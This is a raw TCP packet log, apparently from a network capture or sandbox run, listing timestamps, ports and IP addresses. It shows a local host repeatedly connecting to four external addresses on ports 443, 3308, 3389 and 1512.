Jan 12, 2021 01:44:47.285273075 CET	443	49253	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:47.403095961 CET	443	49253	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:47.403140068 CET	443	49253	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:47.403481960 CET	49253	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:47.409184933 CET	49253	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:47.461122990 CET	443	49253	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:47.524561882 CET	49254	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:47.567890882 CET	3308	49254	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:47.568105936 CET	49254	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:47.569734097 CET	49254	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:47.612777948 CET	3308	49254	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:47.623986006 CET	3308	49254	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:47.624030113 CET	3308	49254	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:47.624192953 CET	49254	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:47.624247074 CET	49254	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:47.637082100 CET	49254	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:47.682053089 CET	3308	49254	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:47.682358980 CET	49254	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:47.687393904 CET	49254	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:47.687796116 CET	49254	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:47.731025934 CET	3308	49254	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:47.731322050 CET	49254	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:47.771337032 CET	3308	49254	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:47.774658918 CET	3308	49254	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:47.774710894 CET	3308	49254	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:47.886903048 CET	3308	49254	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:47.886950970 CET	3308	49254	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:47.887208939 CET	49254	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:47.893028975 CET	49254	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:47.936395884 CET	3308	49254	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:48.008194923 CET	49255	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:48.062695026 CET	3389	49255	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:48.062921047 CET	49255	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:48.064347029 CET	49255	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:48.118813992 CET	3389	49255	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:48.146229982 CET	3389	49255	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:48.146274090 CET	3389	49255	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:48.146467924 CET	49255	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:48.146522999 CET	49255	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:48.160732031 CET	49255	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:48.223504066 CET	3389	49255	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:48.223828077 CET	49255	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:48.233439922 CET	49255	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:48.233829021 CET	49255	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:48.288517952 CET	3389	49255	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:48.288765907 CET	49255	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:48.328006983 CET	3389	49255	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:48.343451977 CET	3389	49255	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:48.343492031 CET	3389	49255	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:48.432835102 CET	3389	49255	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:48.432878971 CET	3389	49255	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:48.433151960 CET	49255	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:48.438863039 CET	49255	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:48.493612051 CET	3389	49255	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:48.554601908 CET	49256	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:48.610219002 CET	1512	49256	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:48.610403061 CET	49256	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:48.611984968 CET	49256	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:48.667876959 CET	1512	49256	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:48.673075914 CET	1512	49256	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:48.673115969 CET	1512	49256	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:48.673257113 CET	49256	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:48.673305988 CET	49256	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:48.691230059 CET	49256	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:48.745222092 CET	1512	49256	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:48.745497942 CET	49256	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:48.755603075 CET	49256	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:48.763319969 CET	49256	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:48.816200018 CET	1512	49256	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:48.816533089 CET	49256	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:48.854367018 CET	1512	49256	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:48.869291067 CET	1512	49256	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:48.970671892 CET	1512	49256	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:48.970716953 CET	1512	49256	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:48.970846891 CET	49256	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:48.970925093 CET	49256	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:48.974656105 CET	49256	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:49.027702093 CET	1512	49256	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:49.080204964 CET	49257	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:49.132330894 CET	443	49257	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:49.132473946 CET	49257	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:49.133987904 CET	49257	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:49.185714960 CET	443	49257	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:49.200659990 CET	443	49257	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:49.200783968 CET	49257	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:49.214977026 CET	49257	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:49.269227028 CET	443	49257	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:49.269642115 CET	49257	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:49.280086994 CET	49257	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:49.280369997 CET	49257	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:49.332252979 CET	443	49257	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:49.332622051 CET	49257	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:49.384546041 CET	443	49257	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:49.503393888 CET	443	49257	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:49.503434896 CET	443	49257	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:49.503726959 CET	49257	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:49.509215117 CET	49257	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:49.560928106 CET	443	49257	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:49.631198883 CET	49258	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:49.674618006 CET	3308	49258	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:49.674782038 CET	49258	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:49.676791906 CET	49258	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:49.720079899 CET	3308	49258	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:49.730973005 CET	3308	49258	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:49.731018066 CET	3308	49258	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:49.731148958 CET	49258	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:49.731200933 CET	49258	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:49.745336056 CET	49258	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:49.790298939 CET	3308	49258	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:49.790731907 CET	49258	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:49.801034927 CET	49258	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:49.801388025 CET	49258	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:49.844594002 CET	3308	49258	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:49.844836950 CET	49258	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:49.885600090 CET	3308	49258	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:49.888094902 CET	3308	49258	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:49.888125896 CET	3308	49258	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:50.001032114 CET	3308	49258	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:50.001075029 CET	3308	49258	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:50.001411915 CET	49258	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:50.006908894 CET	49258	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:50.050376892 CET	3308	49258	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:50.127865076 CET	49259	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:50.182096958 CET	3389	49259	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:50.182307005 CET	49259	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:50.184142113 CET	49259	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:50.238308907 CET	3389	49259	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:50.258775949 CET	3389	49259	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:50.258821964 CET	3389	49259	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:50.258948088 CET	49259	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:50.258996964 CET	49259	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:50.273022890 CET	49259	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:50.336642981 CET	3389	49259	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:50.336956024 CET	49259	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:50.346673012 CET	49259	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:50.346724987 CET	49259	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:50.404340982 CET	3389	49259	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:50.404644012 CET	49259	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:50.444216967 CET	3389	49259	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:50.459024906 CET	3389	49259	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:50.459070921 CET	3389	49259	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:50.549495935 CET	3389	49259	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:50.549540997 CET	3389	49259	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:50.549730062 CET	49259	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:50.549776077 CET	49259	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:50.554652929 CET	49259	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:50.609308004 CET	3389	49259	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:50.777098894 CET	49260	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:50.829956055 CET	1512	49260	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:50.830101013 CET	49260	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:50.831362009 CET	49260	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:50.884212017 CET	1512	49260	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:50.890964031 CET	1512	49260	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:50.891014099 CET	1512	49260	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:50.891093969 CET	49260	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:50.891139030 CET	49260	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:50.914061069 CET	49260	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:50.968142986 CET	1512	49260	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:50.968435049 CET	49260	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:50.972142935 CET	49260	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:50.972194910 CET	49260	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:51.025140047 CET	1512	49260	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:51.025378942 CET	49260	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:51.062319994 CET	1512	49260	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:51.078314066 CET	1512	49260	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:51.182389021 CET	1512	49260	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:51.182425976 CET	1512	49260	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:51.182733059 CET	49260	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:51.192346096 CET	49260	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:51.245229959 CET	1512	49260	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:51.415745020 CET	49261	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:51.468081951 CET	443	49261	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:51.468204975 CET	49261	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:51.468885899 CET	49261	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:51.521274090 CET	443	49261	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:51.536020994 CET	443	49261	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:51.536159039 CET	49261	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:51.543304920 CET	49261	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:51.597944975 CET	443	49261	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:51.598079920 CET	49261	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:51.602060080 CET	49261	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:51.602174997 CET	49261	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:51.654516935 CET	443	49261	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:51.654795885 CET	49261	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:51.691230059 CET	443	49261	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:51.707170010 CET	443	49261	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:51.707214117 CET	443	49261	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:51.825979948 CET	443	49261	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:51.826025009 CET	443	49261	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:51.826302052 CET	49261	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:52.244196892 CET	49261	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:52.296706915 CET	443	49261	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:52.358824015 CET	49262	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:52.402144909 CET	3308	49262	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:52.402328968 CET	49262	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:52.403769970 CET	49262	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:52.446907997 CET	3308	49262	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:52.459367990 CET	3308	49262	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:52.459410906 CET	3308	49262	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:52.459532022 CET	49262	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:52.461570978 CET	49262	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:52.516498089 CET	49262	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:52.562005043 CET	3308	49262	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:52.562098980 CET	49262	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:52.572055101 CET	49262	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:52.572259903 CET	49262	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:52.615482092 CET	3308	49262	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:52.615869999 CET	49262	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:52.655563116 CET	3308	49262	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:52.659185886 CET	3308	49262	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:52.659226894 CET	3308	49262	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:52.772243023 CET	3308	49262	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:52.772290945 CET	3308	49262	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:52.772509098 CET	49262	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:52.778208971 CET	49262	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:52.821377039 CET	3308	49262	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:52.891319036 CET	49263	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:52.946198940 CET	3389	49263	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:52.946333885 CET	49263	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:52.947851896 CET	49263	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:53.002150059 CET	3389	49263	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:53.023442030 CET	3389	49263	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:53.023488998 CET	3389	49263	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:53.023556948 CET	49263	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:53.023602962 CET	49263	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:53.035531998 CET	49263	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:53.095552921 CET	3389	49263	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:53.095663071 CET	49263	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:53.103589058 CET	49263	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:53.103694916 CET	49263	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:53.158791065 CET	3389	49263	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:53.159008980 CET	49263	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:53.198076010 CET	3389	49263	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:53.213589907 CET	3389	49263	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:53.213634968 CET	3389	49263	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:53.303042889 CET	3389	49263	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:53.303082943 CET	3389	49263	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:53.303226948 CET	49263	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:53.308938980 CET	49263	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:53.363384962 CET	3389	49263	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:53.429536104 CET	49264	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:53.482629061 CET	1512	49264	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:53.482831001 CET	49264	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:53.484338045 CET	49264	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:53.537264109 CET	1512	49264	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:53.544311047 CET	1512	49264	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:53.544354916 CET	1512	49264	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:53.544500113 CET	49264	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:53.544550896 CET	49264	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:53.559067965 CET	49264	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:53.613176107 CET	1512	49264	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:53.613539934 CET	49264	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:53.623522043 CET	49264	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:53.623872042 CET	49264	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:53.677043915 CET	1512	49264	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:53.677436113 CET	49264	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:53.714508057 CET	1512	49264	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:53.730716944 CET	1512	49264	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:53.730760098 CET	1512	49264	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:53.828391075 CET	1512	49264	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:53.828449965 CET	1512	49264	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:53.828560114 CET	49264	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:53.828609943 CET	49264	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:53.832715988 CET	49264	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:53.885838032 CET	1512	49264	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:53.948548079 CET	49265	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:54.000596046 CET	443	49265	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:54.000726938 CET	49265	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:54.002405882 CET	49265	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:54.054372072 CET	443	49265	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:54.069024086 CET	443	49265	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:54.069308996 CET	49265	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:54.078759909 CET	49265	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:54.133081913 CET	443	49265	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:54.133410931 CET	49265	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:54.142517090 CET	49265	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:54.142652988 CET	49265	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:54.194613934 CET	443	49265	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:54.194848061 CET	49265	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:54.246942997 CET	443	49265	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:54.364300013 CET	443	49265	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:54.364341974 CET	443	49265	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:54.364552975 CET	49265	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:54.364972115 CET	49265	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:54.370513916 CET	49265	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:54.422374964 CET	443	49265	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:54.483177900 CET	49266	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:54.526568890 CET	3308	49266	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:54.526711941 CET	49266	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:54.528249979 CET	49266	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:54.571428061 CET	3308	49266	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:54.586272001 CET	3308	49266	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:54.586302996 CET	3308	49266	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:54.586447954 CET	49266	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:54.600550890 CET	49266	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:54.645946980 CET	3308	49266	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:54.646117926 CET	49266	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:54.655441999 CET	49266	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:54.655623913 CET	49266	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:54.698790073 CET	3308	49266	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:54.699131012 CET	49266	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:54.739319086 CET	3308	49266	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:54.742425919 CET	3308	49266	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:54.742469072 CET	3308	49266	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:54.855340958 CET	3308	49266	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:54.855385065 CET	3308	49266	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:54.855743885 CET	49266	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:54.861196041 CET	49266	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:54.904414892 CET	3308	49266	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:54.982120037 CET	49267	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:55.036442041 CET	3389	49267	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:55.036609888 CET	49267	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:55.037686110 CET	49267	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:55.091550112 CET	3389	49267	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:55.105278015 CET	3389	49267	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:55.105319977 CET	3389	49267	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:55.105405092 CET	49267	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:55.105467081 CET	49267	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:55.127857924 CET	49267	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:55.190866947 CET	3389	49267	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:55.191095114 CET	49267	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:55.196577072 CET	49267	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:55.196634054 CET	49267	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:55.250678062 CET	3389	49267	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:55.251050949 CET	49267	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:55.290178061 CET	3389	49267	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:55.305010080 CET	3389	49267	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:55.305051088 CET	3389	49267	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:55.395898104 CET	3389	49267	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:55.395937920 CET	3389	49267	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:55.396262884 CET	49267	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:55.401799917 CET	49267	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:55.455863953 CET	3389	49267	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:55.511909962 CET	49268	1512	192.168.2.22	46.105.131.65
